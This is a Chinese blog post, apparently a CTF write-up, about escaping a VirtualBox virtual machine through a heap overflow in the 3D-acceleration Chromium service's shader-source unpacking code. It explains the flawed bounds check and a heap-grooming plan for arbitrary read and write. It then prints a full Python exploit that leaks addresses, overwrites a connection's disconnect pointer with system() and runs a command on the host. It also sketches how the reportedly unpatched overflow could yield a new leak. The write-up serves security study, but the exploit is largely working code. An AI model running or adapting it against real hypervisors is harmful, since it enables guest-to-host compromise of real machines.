<h2 id="48小时逃逸Virtualbox虚拟机——记一次CTF中的0day之旅"><a href="#48小时逃逸Virtualbox虚拟机——记一次CTF中的0day之旅" class="headerlink" title="48小时逃逸Virtualbox虚拟机——记一次CTF中的0day之旅"></a>48小时逃逸Virtualbox虚拟机——记一次CTF中的0day之旅</h2><p><a href="https://zhuanlan.zhihu.com/p/58910752" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/58910752</a></p>
<p><a href="https://xz.aliyun.com/t/5008" target="_blank" rel="noopener">https://xz.aliyun.com/t/5008</a></p>
<h3 id="漏洞点简介"><a href="#漏洞点简介" class="headerlink" title="漏洞点简介"></a>漏洞点简介</h3><p>virtualbox通过引入OpenGL的共享库来引入3D加速功能，而Chromium负责解析Virtualbox。Chromium定义了一套用来描述OpenGL不同操作的网络协议。3D加速是作为一个virtualbox自定义的hgcm服务进程存在的。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">crUnpackExtendShaderSource</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    GLint *length = <span class="literal">NULL</span>;</span><br><span class="line">    GLuint shader = READ_DATA(<span class="number">8</span>, GLuint);</span><br><span class="line">    GLsizei count = READ_DATA(<span class="number">12</span>, GLsizei);</span><br><span class="line">    GLint hasNonLocalLen = READ_DATA(<span class="number">16</span>, GLsizei);</span><br><span class="line">    GLint *pLocalLength = DATA_POINTER(<span class="number">20</span>, GLint);</span><br><span class="line">    <span class="keyword">char</span> **ppStrings = <span class="literal">NULL</span>;</span><br><span class="line">    GLsizei i, j, jUpTo;</span><br><span class="line">    <span class="keyword">int</span> pos, pos_check;</span><br><span class="line">    ​</span><br><span class="line">    <span class="keyword">if</span> (count &gt;= UINT32_MAX / <span class="keyword">sizeof</span>(<span class="keyword">char</span> *) / <span class="number">4</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        crError(<span class="string">"crUnpackExtendShaderSource: count %u is out of range"</span>, count);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    ​</span><br><span class="line">    pos = <span class="number">20</span> + count * <span class="keyword">sizeof</span>(*pLocalLength);</span><br><span class="line">    ​</span><br><span class="line">    <span class="keyword">if</span> (hasNonLocalLen &gt; <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        length = DATA_POINTER(pos, GLint);</span><br><span class="line">        pos += count * <span class="keyword">sizeof</span>(*length);</span><br><span class="line">    &#125;</span><br><span class="line">    ​</span><br><span class="line">    pos_check = pos;</span><br><span class="line">    ​</span><br><span class="line">    <span class="keyword">if</span> (!DATA_POINTER_CHECK(pos_check))</span><br><span class="line">    &#123;</span><br><span class="line">        crError(<span class="string">"crUnpackExtendShaderSource: pos %d is out of range"</span>, pos_check);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    ​</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; count; ++i)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (pLocalLength[i] &lt;= <span class="number">0</span> || pos_check &gt;= INT32_MAX - pLocalLength[i] || !DATA_POINTER_CHECK(pos_check))</span><br><span class="line">        &#123;</span><br><span class="line">            crError(<span class="string">"crUnpackExtendShaderSource: pos %d is out of range"</span>, pos_check);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    ​</span><br><span class="line">        pos_check += pLocalLength[i];</span><br><span class="line">    &#125;</span><br><span class="line">    ​</span><br><span class="line">    ppStrings = crAlloc(count * <span class="keyword">sizeof</span>(<span class="keyword">char</span>*));</span><br><span class="line">    <span class="keyword">if</span> (!ppStrings) <span class="keyword">return</span>;</span><br><span class="line">    ​</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; count; ++i)</span><br><span class="line">    &#123;</span><br><span class="line">        ppStrings[i] = DATA_POINTER(pos, <span class="keyword">char</span>);</span><br><span class="line">        pos += pLocalLength[i];</span><br><span class="line">        <span class="keyword">if</span> (!length)</span><br><span class="line">        &#123;</span><br><span class="line">            pLocalLength[i] -= <span class="number">1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    ​</span><br><span class="line">        Assert(pLocalLength[i] &gt; <span class="number">0</span>);</span><br><span class="line">        jUpTo = i == count <span class="number">-1</span> ? pLocalLength[i] - <span class="number">1</span> : pLocalLength[i];</span><br><span class="line">        <span class="keyword">for</span> (j = <span class="number">0</span>; j &lt; jUpTo; ++j)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">char</span> *pString = ppStrings[i];</span><br><span class="line">    ​</span><br><span class="line">            <span class="keyword">if</span> (pString[j] == <span class="string">'\0'</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                Assert(j == jUpTo - <span class="number">1</span>);</span><br><span class="line">                pString[j] = <span class="string">'\n'</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">​</span><br><span class="line"><span class="comment">//    cr_unpackDispatch.ShaderSource(shader, count, ppStrings, length ? length : pLocalLength);</span></span><br><span class="line">    cr_unpackDispatch.ShaderSource(shader, <span class="number">1</span>, (<span class="keyword">const</span> <span class="keyword">char</span>**)ppStrings, <span class="number">0</span>);</span><br><span class="line">    ​</span><br><span class="line">    crFree(ppStrings);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>此方法使用宏READ_DATA获取用户数据。它只需读取客户机使用HGCM接口发送的消息(此消息存储在堆中)。然后调整输入并将其传递给cr_unpackDispatch.ShaderSource()。</p>
<p>实际的漏洞不太明显。即在第一个循环中，pos_check增加了一个数组的长度。在每次迭代中，都会验证地址，以确保总长度仍然在范围内。这段代码的问题是，pos_check只在下一次迭代中测试是否越界。这意味着数组的最后一个元素从未经过测试，并且可以任意大。</p>
<p>缺少验证会产生什么影响？本质上，在嵌套循环中，j表示pString的索引，并从0计数到pLocalLength[i]。这个循环将每个\0字节转换为一个\n字节。对于任意长度，我们可以使循环超出边界，并且由于pString指向堆上的HGCM消息中的数据，这实际上是一个堆溢出问题。</p>
<p>它可以将越界部分所有的’\0’替换为’\n’：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> (j = <span class="number">0</span>; j &lt; jUpTo; ++j)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">char</span> *pString = ppStrings[i];</span><br><span class="line">    ​</span><br><span class="line">    <span class="keyword">if</span> (pString[j] == <span class="string">'\0'</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        Assert(j == jUpTo - <span class="number">1</span>);</span><br><span class="line">        pString[j] = <span class="string">'\n'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>利用</h3><h4 id="信息泄露"><a href="#信息泄露" class="headerlink" title="信息泄露"></a>信息泄露</h4><p>信息泄露部分完全与CVE-2018-3055基本相同，重写make_oob_read后通过leak_stuff我们可以泄露一个CRConnection结构体的位置，而niklasb的exp中就是通过修改pHostBuffer和cbHostBuffer来实现任意地址读。因此，当我们有任意地址写的条件之后我们就可以任意地址读了。</p>
<p>TODO：CVE-2018-3055是什么懒得看，具体方法在下文exp中。</p>
<h4 id="任意地址写"><a href="#任意地址写" class="headerlink" title="任意地址写"></a>任意地址写</h4><p>一个好用的结构体：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">CRVBOXSVCBUFFER_t</span> &#123;</span></span><br><span class="line">    <span class="keyword">uint32_t</span> uiId;</span><br><span class="line">    <span class="keyword">uint32_t</span> uiSize;</span><br><span class="line">    <span class="keyword">void</span>*    pData;</span><br><span class="line">    _CRVBOXSVCBUFFER_t *pNext, *pPrev;</span><br><span class="line">&#125; CRVBOXSVCBUFFER_t;</span><br></pre></td></tr></table></figure>
<p>把越界写内存后面布置这么一个结构体，然后越界写它的uiSize，再越界写这个buffer的pData，然后再越界写另一个相同的结构体，就可以任意地址写了。</p>
<ol>
<li>n次调用alloc_buf，对应的buffer填充为可以触发越界写的部分，从而确保在我们可以越界写的堆后有可用的CRVBOXSVCBUFFER_t结构体。</li>
<li>通过SHCRGL_GUEST_FN_WRITE_READ使用第n-3个buffer，触发堆越界写，覆盖掉第n-2个buffer的size部分。</li>
<li>通过SHCRGL_GUEST_FN_WRITE使用第n-2个buffer，触发堆越界写，可以修改第n-1个buffer的uiSize和pData为任意值。</li>
<li>通过SHCRGL_GUEST_FN_WRITE使用第n-1个buffer，触发任意地址写，写的地址与长度由步骤3控制。</li>
<li>多次任意地址写可以通过多次反复SHCRGL_GUEST_FN_WRITE第n-2个buffer和第n-1个buffer实现。</li>
</ol>
<h4 id="整体利用"><a href="#整体利用" class="headerlink" title="整体利用"></a>整体利用</h4><ol>
<li>通过越界读泄露一个CRConnection结构体的位置</li>
<li>配置内存实现任意地址写</li>
<li>通过任意地址读泄露CRConnection结构体中alloc函数对应地址</li>
<li>通过alloc函数地址计算VBoxOGLhostcrutil.so库地址，最终泄露libc地址</li>
<li>修改CRConnection的disconnect函数指针为system</li>
<li>修改CRConnection的头部为payload</li>
<li>disconnect对应的client</li>
</ol>
<h4 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp"></a>完整exp</h4><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python2</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">import</span> os, sys</span><br><span class="line"><span class="keyword">from</span> array <span class="keyword">import</span> array</span><br><span class="line"><span class="keyword">from</span> struct <span class="keyword">import</span> pack, unpack</span><br><span class="line">​</span><br><span class="line">sys.path.append(os.path.abspath(os.path.dirname(__file__)) + <span class="string">'/lib'</span>)</span><br><span class="line"><span class="keyword">from</span> chromium <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> hgcm <span class="keyword">import</span> *</span><br><span class="line">​</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">make_oob_read</span><span class="params">(offset)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> (</span><br><span class="line">        pack(<span class="string">"&lt;III"</span>, CR_MESSAGE_OPCODES, <span class="number">0x41414141</span>, <span class="number">1</span>)</span><br><span class="line">        + <span class="string">'\0\0\0'</span> + chr(CR_EXTEND_OPCODE)</span><br><span class="line">        + pack(<span class="string">"&lt;I"</span>, offset)</span><br><span class="line">        + pack(<span class="string">"&lt;I"</span>, CR_GETUNIFORMLOCATION_EXTEND_OPCODE)</span><br><span class="line">        + pack(<span class="string">"&lt;I"</span>, <span class="number">0</span>)</span><br><span class="line">        + <span class="string">'LEET'</span></span><br><span class="line">        )</span><br><span class="line">​</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak_conn</span><span class="params">(client)</span>:</span></span><br><span class="line">    <span class="string">''' Return a CRConnection address, and the associated client handle '''</span></span><br><span class="line">    <span class="comment"># Spray some buffers of sizes</span></span><br><span class="line">    <span class="comment">#  0x290 = sizeof(CRConnection) and</span></span><br><span class="line">    <span class="comment">#  0x9d0 = sizeof(CRClient)</span></span><br><span class="line">    <span class="keyword">for</span> _ <span class="keyword">in</span> range(<span class="number">600</span>):</span><br><span class="line">        alloc_buf(client, <span class="number">0x290</span>)</span><br><span class="line">    <span class="keyword">for</span> _ <span class="keyword">in</span> range(<span class="number">600</span>):</span><br><span class="line">        alloc_buf(client, <span class="number">0x9d0</span>)</span><br><span class="line">​</span><br><span class="line">    <span class="comment"># This will allocate a CRClient and CRConnection right next to each other.</span></span><br><span class="line">    new_client = hgcm_connect(<span class="string">"VBoxSharedCrOpenGL"</span>)</span><br><span class="line">​</span><br><span class="line">    <span class="keyword">for</span> _ <span class="keyword">in</span> range(<span class="number">2</span>):</span><br><span class="line">        alloc_buf(client, <span class="number">0x290</span>)</span><br><span class="line">    <span class="keyword">for</span> _ <span class="keyword">in</span> range(<span class="number">2</span>):</span><br><span class="line">        alloc_buf(client, <span class="number">0x9d0</span>)</span><br><span class="line">​</span><br><span class="line">    hgcm_disconnect(new_client)</span><br><span class="line">​</span><br><span class="line">    <span class="comment"># Leak pClient member of CRConnection struct, and from that compute</span></span><br><span class="line">    <span class="comment"># CRConnection address.</span></span><br><span class="line">    msg = make_oob_read(OFFSET_CONN_CLIENT)</span><br><span class="line">    leak = crmsg(client, msg, <span class="number">0x290</span>)[<span class="number">16</span>:<span class="number">24</span>]</span><br><span class="line">    pClient, = unpack(<span class="string">"&lt;Q"</span>, leak[:<span class="number">8</span>])</span><br><span class="line">    pConn = pClient + <span class="number">0x9e0</span></span><br><span class="line">    new_client = hgcm_connect(<span class="string">"VBoxSharedCrOpenGL"</span>)</span><br><span class="line">    set_version(new_client)</span><br><span class="line">    <span class="keyword">return</span> new_client, pConn, pClient</span><br><span class="line">​</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Pwn</span><span class="params">(object)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">write</span><span class="params">(self, where, what)</span>:</span></span><br><span class="line">        pay = <span class="string">'A'</span>*<span class="number">8</span>+pack(<span class="string">"&lt;Q"</span>,where)</span><br><span class="line">        buf,_,_,_=hgcm_call(self.client1,<span class="number">13</span>,[self.write_buf,self.write_buf_size,<span class="number">0x40</span>,pay])</span><br><span class="line"></span><br><span class="line">        hgcm_call(self.client1,<span class="number">13</span>,[<span class="number">0x41414141</span>,<span class="number">0x41414141</span>,<span class="number">0</span>,what])</span><br><span class="line">​</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">write64</span><span class="params">(self, where, what)</span>:</span></span><br><span class="line">        self.write(where, pack(<span class="string">"&lt;Q"</span>, what))</span><br><span class="line">​</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">read</span><span class="params">(self, where, n, canfail=False)</span>:</span></span><br><span class="line">        <span class="comment"># Set pHostBuffer and cbHostBuffer, then read from the Chromium stream.</span></span><br><span class="line">        self.write64(self.pConn + OFFSET_CONN_HOSTBUF, where)</span><br><span class="line">        self.write64(self.pConn + OFFSET_CONN_HOSTBUFSZ, n)</span><br><span class="line">        res, sz = hgcm_call(self.client3, SHCRGL_GUEST_FN_READ, [<span class="string">"A"</span>*<span class="number">0x1000</span>, <span class="number">0x1000</span>])</span><br><span class="line">        <span class="keyword">if</span> canfail <span class="keyword">and</span> sz != n:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">        <span class="keyword">assert</span> sz == n</span><br><span class="line">        <span class="keyword">return</span> res[:n]</span><br><span class="line">​</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">read64</span><span class="params">(self, where, canfail=False)</span>:</span></span><br><span class="line">        leak = self.read(where, <span class="number">8</span>, canfail)</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> leak:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">        <span class="keyword">return</span> unpack(<span class="string">'&lt;Q'</span>, leak)[<span class="number">0</span>]</span><br><span class="line">​</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">leak_stuff</span><span class="params">(self)</span>:</span></span><br><span class="line">        self.client1 = hgcm_connect(<span class="string">"VBoxSharedCrOpenGL"</span>)</span><br><span class="line">        set_version(self.client1)</span><br><span class="line">​</span><br><span class="line">        self.client2 = hgcm_connect(<span class="string">"VBoxSharedCrOpenGL"</span>)</span><br><span class="line">        set_version(self.client2)</span><br><span class="line">​</span><br><span class="line">        <span class="comment"># TODO maybe spray even more?</span></span><br><span class="line">        <span class="keyword">for</span> _ <span class="keyword">in</span> range(<span class="number">3</span>):</span><br><span class="line">            <span class="keyword">for</span> _ <span class="keyword">in</span> range(<span class="number">400</span>): alloc_buf(self.client1, <span class="number">0x290</span>)</span><br><span class="line">            <span class="keyword">for</span> _ <span class="keyword">in</span> range(<span class="number">400</span>): alloc_buf(self.client1, <span class="number">0x9d0</span>)</span><br><span class="line">            <span class="keyword">for</span> _ <span class="keyword">in</span> range(<span class="number">600</span>): alloc_buf(self.client1, <span class="number">0x30</span>)</span><br><span class="line">​</span><br><span class="line">        <span class="comment"># self.master_id, self.master, _ = leak_buf(self.client1)</span></span><br><span class="line">        <span class="comment"># print('[*] Header for buffer # %d is at 0x%016x (master)' % (self.master_id, self.master))</span></span><br><span class="line">        <span class="comment"># self.victim_id, self.victim, _ = leak_buf(self.client1)</span></span><br><span class="line">        <span class="comment"># print('[*] Header for buffer # %d is at 0x%016x (victim)' % (self.victim_id, self.victim))</span></span><br><span class="line">​</span><br><span class="line">        self.client3, self.pConn, _ = leak_conn(self.client1)</span><br><span class="line">        print(<span class="string">'[*] Leaked CRConnection @ 0x%016x'</span> % self.pConn)</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">setup_write</span><span class="params">(self)</span>:</span></span><br><span class="line">        msg = pack(<span class="string">"&lt;III"</span>, CR_MESSAGE_OPCODES, <span class="number">0x41414141</span>, <span class="number">1</span>) \</span><br><span class="line">              + <span class="string">'\0\0\0'</span> + chr(CR_EXTEND_OPCODE) \</span><br><span class="line">              + <span class="string">'aaaa'</span> \</span><br><span class="line">              + pack(<span class="string">"&lt;I"</span>, CR_SHADERSOURCE_EXTEND_OPCODE) \</span><br><span class="line">              + pack(<span class="string">"&lt;IIIII"</span>, <span class="number">0</span>, <span class="number">0x2</span>, <span class="number">0</span>, <span class="number">0x1</span>, <span class="number">0x1a</span>+<span class="number">2</span>) +<span class="string">'A'</span>*<span class="number">4</span></span><br><span class="line">        bufs = []</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0x1000</span>):</span><br><span class="line">            bufs.append(alloc_buf(self.client1, len(msg), msg))</span><br><span class="line">        _, res, _ = hgcm_call(self.client1, SHCRGL_GUEST_FN_WRITE_READ_BUFFERED, [bufs[<span class="number">-5</span>], <span class="string">"A"</span>*<span class="number">0x50</span>, <span class="number">0x50</span>])</span><br><span class="line">        self.write_buf = <span class="number">0x0a0a0000</span>+bufs[<span class="number">-4</span>];</span><br><span class="line">        self.write_buf_size = <span class="number">0x0a0a30</span>;</span><br><span class="line">​</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">setup</span><span class="params">(self)</span>:</span></span><br><span class="line">        self.leak_stuff()</span><br><span class="line">        self.setup_write()</span><br><span class="line"></span><br><span class="line">        self.crVBoxHGCMFree = self.read64(self.pConn + OFFSET_CONN_FREE, canfail=<span class="literal">True</span>)</span><br><span class="line">        print(<span class="string">'[*] Leaked crVBoxHGCMFree @ 0x%016x'</span> % self.crVBoxHGCMFree)</span><br><span class="line"></span><br><span class="line">        libbase = self.crVBoxHGCMFree - <span class="number">0x20650</span></span><br><span class="line">        self.system = self.read64(libbase + <span class="number">0x22e3d0</span>, canfail=<span class="literal">True</span>) - <span class="number">0x122ec0</span> + <span class="number">0x4f440</span></span><br><span class="line">        print(<span class="string">'[*] Leaked system @ 0x%016x'</span> % self.system)</span><br><span class="line">​</span><br><span class="line">        self.write64(self.pConn + <span class="number">0x128</span>, self.system)</span><br><span class="line">        self.write(self.pConn, <span class="string">"mousepad /home/c3mousepad /home/c3ctf/Desktop/flag.txt\x00"</span>)</span><br><span class="line">        <span class="string">'''</span></span><br><span class="line"><span class="string">        self.write64(self.pConn + OFFSET_CONN_HOSTBUF, self.writer_msg)</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        hgcm_disconnect(self.client1)</span></span><br><span class="line"><span class="string">        '''</span></span><br><span class="line">        <span class="keyword">return</span></span><br><span class="line">​</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    p = Pwn()</span><br><span class="line">    p.setup()</span><br><span class="line">    <span class="comment">#if raw_input('you want RIP control? [y/n] ').startswith('y'):</span></span><br><span class="line">    <span class="comment">#    p.rip(0xdeadbeef)</span></span><br></pre></td></tr></table></figure>
<h3 id="进一步思考"><a href="#进一步思考" class="headerlink" title="进一步思考"></a>进一步思考</h3><p>官方修了两处信息泄露，并没有修溢出，当没有leak里，我们依然有<code>任意地址写</code>和<code>堆越界写</code>。</p>
<p>我们进一步思考如何利用堆溢出再实现信息泄露：</p>
<ol>
<li>在我们可以越界写的Buffer后放一个CR_GETUNIFORMLOCATION_EXTEND的Buffer。</li>
<li>越界写改大CR_GETUNIFORMLOCATION_EXTEND Buffer的size部分。</li>
<li>通过WRITE_READ_BUFFERED进入crUnpackExtendGetUniformLocation实现越界读。</li>
</ol>
<p>如果在CR_GETUNIFORMLOCATION_EXTEND Buffer之后恰好可以放一个CRClient或者CRConnection的结构体，就可以泄露关键的结构体了。</p>

                
<p class="pink-link-context">
    <a href="/2020/05/22/Windows10堆分配及利用从入门到入门/" rel="next" title="Windows10堆分配及利用从入门到入门">
    Prev: Windows10堆分配及利用从入门到入门
  </a>
</p>



<p class="pink-link-context">
    <a href="/2020/05/04/文档型漏洞入门学习/" rel="next" title="文档型漏洞入门学习">
    Next: 文档型漏洞入门学习
  </a>
</p>


            </div>
			
        </div>
    </div>
</article>






</div>

        <div class="fixed-action-btn float-sitemap">
    <a class="btn-floating btn-large pink">
      <i class="fa fa-caret-square-o-up"></i>
    </a>
    <ul>
      <li><a class="btn-return-top btn-floating waves-effect pink" title="Return to top"><i class="fa fa-arrow-circle-o-up"></i></a></li>
      <li><a class="btn-floating waves-effect button-collapse pink darken-1"  data-activates="main-menu" title="Menu"><i class="fa fa-navicon"></i></a></li>
    </ul>
  </div>

    </main>
    <footer class="page-footer pink accent-1 darken-1">
    
    <div class="footer-container container">
        <div class="row">
            
            <div class="social-group col m4 s12">
                <h5 class="white-text">Social</h5>
                
                    <a class="social-link" href="https://github.com/cracke-s-j" target="_blank">
                        <i class="fa fa-2x fa-github"></i>
                    </a>
                
                

            </div>
            

            
            <div class="col m8 s12">
                <h5 class="white-text">Links</h5>
                
                    <a class="social-link" href="https://blog.dyf.ink/" target="_blank">友情链接 dyf&#39;s blog</a>
                
            </div>
            
        </div>
    </div>
    

    <div class="footer-copyright pink-link-context">
        <div class="container">
            © 2020 ssj, All rights reserved.
            <p class="right" style="margin-top: 0;">Blog powered by <a href="https://hexo.io">Hexo</a> | Theme <a href="https://github.com/raytaylorlin/hexo-theme-raytaylorism">raytaylorism</a></p>
        </div>
    </div>
</footer>


    <noscript>
    <div class="noscript">
        <p class="center-align">当前网速较慢或者你使用的浏览器不支持博客特定功能，请尝试刷新或换用Chrome、Firefox等现代浏览器</p>
    </div>
</noscript>
<div class="noscript">
    <p class="center-align">当前网速较慢或者你使用的浏览器不支持博客特定功能，请尝试刷新或换用Chrome、Firefox等现代浏览器</p>
</div>


<script src="/js/jquery.min.js"></script>
<script src="/js/materialize.min.js"></script>

<script>
    (function($) {
        $(document).ready(function() {
            // 隐藏禁用javascript（针对微信内置浏览器）的提示
            $('.noscript').hide();

            // 图片缩放效果
            var $imgs = $('img').not('.slider-image').not('.avatar-image').not('.carousel-image').not('.card-cover-image').not('.qrcode');

            // 给图片加上点击放大效果（materialbox插件）
            $imgs.addClass('materialboxed').each(function(i, el) {
                $(this).attr('data-caption', $(this).attr('alt') || ' ');
            }).materialbox();

            // 优化表格的显示
            $('table').each(function() {
                var $table = $(this);
                // 除去多行代码的情况
                if ($table.find('pre').length == 0) {
                    $table.addClass('responsive-table striped bordered');
                }
            });

            // 首页幻灯片
            $('.slider').slider({indicators: true, full_width: true, interval: 8000});

            $(".button-collapse").sideNav();
            $(".category-menu").sideNav();

            // 针对gallery post
            $('.carousel').carousel({full_width: true});
            $('.carousel-control.prev').click(function() {
                $('.carousel').carousel('prev');
            });
            $('.carousel-control.next').click(function() {
                $('.carousel').carousel('next');
            });

            // 文章目录
            $('article').not('.simple-article').find('h1').add('h2').add('h3').add('h4').add('h5').add('h6').scrollSpy();

            // 目录随屏幕滚动（防止目录过长越过footer）
            var $toc = $('.toc');
            var scrollTargetTop = 0;
            $(window).scroll(function() {
                var $activeLink = $toc.find('a.active.section');
                if ($(window).scrollTop() < 100) {
                    scrollTargetTop = 0;
                } else {
                    if ($activeLink[0]) {
                        scrollTargetTop = $activeLink.offset().top - $toc.offset().top;
                    }
                }
                $toc.css('top', '-' + scrollTargetTop + 'px');
            });

            // 修正文章目录的left-border颜色
            var color = $('.table-of-contents-text').css('color');
